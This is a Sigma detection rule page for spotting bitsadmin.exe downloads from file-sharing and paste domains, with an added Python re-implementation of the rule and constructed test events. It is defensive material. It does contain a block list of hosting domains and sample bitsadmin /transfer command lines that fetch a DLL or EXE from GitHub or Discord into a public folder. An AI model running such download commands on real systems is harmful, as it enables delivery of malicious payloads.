Suspicious Download From File-Sharing Website Via Bitsadmin
Detects usage of bitsadmin downloading a file from a suspicious domain
Sigma rule

```yaml
title: Suspicious Download From File-Sharing Website Via Bitsadmin
id: 8518ed3d-f7c9-4601-a26c-f361a4256a0c
related:
    - id: 8b48ad89-10d8-4382-a546-50588c410f0d
      type: similar
    - id: d635249d-86b5-4dad-a8c7-d7272b788586
      type: similar
    - id: 52182dfb-afb7-41db-b4bc-5336cb29b464
      type: similar
    - id: ae02ed70-11aa-4a22-b397-c0d0e8f6ea99
      type: similar
    - id: e0f8ab85-0ac9-423b-a73a-81b3c7b1aa97
      type: similar
    - id: 7b434893-c57d-4f41-908d-6a17bf1ae98f
      type: similar
    - id: 42a5f1e7-9603-4f6d-97ae-3f37d130d794
      type: similar
    - id: 56454143-524f-49fb-b1c6-3fb8b1ad41fb
      type: similar
    - id: b6e04788-29e1-4557-bb14-77f761848ab8
      type: similar
    - id: a0d7e4d2-bede-4141-8896-bc6e237e977c
      type: similar
    - id: 297ae038-edc2-4b2e-bb3e-7c5fc94dd5c7
      type: similar
status: test
description: Detects usage of bitsadmin downloading a file from a suspicious domain
references:
    - https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin
    - https://isc.sans.edu/diary/22264
    - https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/
    - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker
    - https://www.cisa.gov/uscert/ncas/alerts/aa22-321a
    - https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/
author: Florian Roth (Nextron Systems)
date: 2022-06-28
modified: 2026-03-29
tags:
    - attack.persistence
    - attack.execution
    - attack.stealth
    - attack.t1197
    - attack.s0190
    - attack.t1036.003
    - attack.command-and-control
    - attack.t1105
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\bitsadmin.exe'
        - OriginalFileName: 'bitsadmin.exe'
    selection_flags:
        CommandLine|contains:
            - ' /transfer '
            - ' /create '
            - ' /addfile '
    selection_domain:
        CommandLine|contains:
            - '.githubusercontent.com' # Includes both gists and github repositories / Michael Haag (idea)
            - '0x0.st'
            - 'anonfiles.com'
            - 'bashupload.com'
            - 'cdn.discordapp.com'
            - 'chunk.io'
            - 'ddns.net'
            - 'dl.dropboxusercontent.com'
            - 'ghostbin.co'
            - 'github.com' # bitsadmin /transfer n https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1047/bin/calc.dll %PUBLIC%\calc.dll
            - 'glitch.me'
            - 'gofile.io'
            - 'hastebin.com'
            - 'mediafire.com'
            - 'mega.nz'
            - 'onrender.com'
            - 'pages.dev'
            - 'paste.ee'
            - 'pastebin.com'
            - 'pastebin.pl'
            - 'pastetext.net'
            - 'privatlab.com'
            - 'privatlab.net'
            - 'send.exploit.in'
            - 'sendspace.com'
            - 'storage.googleapis.com'
            - 'storjshare.io'
            - 'supabase.co'
            - 'temp.sh'
            - 'transfer.sh'
            - 'trycloudflare.com'
            - 'ufile.io'
            - 'w3spaces.com'
            - 'workers.dev'
            - 'x0.at'
    condition: all of selection_*
falsepositives:
    - Some legitimate apps use this, but limited.
level: high
regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_bitsadmin_download_file_sharing_domains/info.yml
simulation:
    - type: atomic-red-team
      name: Windows - BITSAdmin BITS Download
      technique: T1105
      atomic_guid: a1921cd3-9a2d-47d5-a891-f1d0f2a7a31b
```
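To show how the rule's three selections combine under `condition: all of selection_*`, here is an added Python re-implementation of its matching logic run over constructed process_creation events (example code written for this page, not the Sigma project's own; the domain list is a subset of the one in the rule, and all event values are made up):

```python
from dataclasses import dataclass
# Subset of the rule's selection_domain list (constructed example, not the full list).
SUSPICIOUS_DOMAINS = (
    ".githubusercontent.com", "cdn.discordapp.com", "dl.dropboxusercontent.com",
    "github.com", "mega.nz", "pastebin.com", "transfer.sh", "trycloudflare.com",
)
TRANSFER_FLAGS = (" /transfer ", " /create ", " /addfile ")

@dataclass
class ProcessEvent:
    """The process_creation fields the rule reads (Sysmon event ID 1 field names)."""
    image: str
    original_file_name: str
    command_line: str

def selection_img(ev):
    # A list under a selection is OR; Sigma string matching is case-insensitive.
    return (ev.image.lower().endswith("\\bitsadmin.exe")
            or ev.original_file_name.lower() == "bitsadmin.exe")

def selection_flags(ev):
    return any(flag in ev.command_line.lower() for flag in TRANSFER_FLAGS)

def selection_domain(ev):
    return any(domain in ev.command_line.lower() for domain in SUSPICIOUS_DOMAINS)

def rule_matches(ev):
    """condition: all of selection_* -- every selection must hold at once."""
    return selection_img(ev) and selection_flags(ev) and selection_domain(ev)

# Constructed sample events, not real telemetry.
SAMPLES = {
    # Raw GitHub download: image, /transfer flag and listed domain all present.
    "github_transfer": ProcessEvent(r"C:\Windows\System32\bitsadmin.exe", "bitsadmin.exe",
        r"bitsadmin /transfer n https://raw.githubusercontent.com/example/repo/main/a.dll C:\Users\Public\a.dll"),
    # Renamed copy: Image misses but OriginalFileName (PE header) still matches; the
    # capitalised /Transfer shows why matching must be case-insensitive.
    "renamed_binary": ProcessEvent(r"C:\Users\Public\svc.exe", "bitsadmin.exe",
        r"svc.exe /Transfer job https://cdn.discordapp.com/attachments/1/2/p.exe C:\Users\Public\p.exe"),
    # Internal update server: /transfer present but no listed domain, so no alert.
    "internal_mirror": ProcessEvent(r"C:\Windows\System32\bitsadmin.exe", "bitsadmin.exe",
        r"bitsadmin /transfer patch http://wsus.corp.example/updates/kb.msu C:\Temp\kb.msu"),
    # Job listing: neither a transfer flag nor a listed domain.
    "list_only": ProcessEvent(r"C:\Windows\System32\bitsadmin.exe", "bitsadmin.exe",
        "bitsadmin /list /allusers"),
}

def evaluate(samples=SAMPLES):
    """Return {sample name: rule matched} for each event."""
    return {name: rule_matches(ev) for name, ev in samples.items()}
```

The `internal_mirror` case is the one to keep in mind when tuning: the rule deliberately fires only on the listed hosting domains, so downloads from internal servers are left to the related "File Download Via Bitsadmin" rule.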
Related rules
- File Download Via Bitsadmin
- File Download Via Bitsadmin To A Suspicious Target Folder
- File With Suspicious Extension Downloaded Via Bitsadmin
- Bitsadmin to Uncommon IP Server Address
- Bitsadmin to Uncommon TLD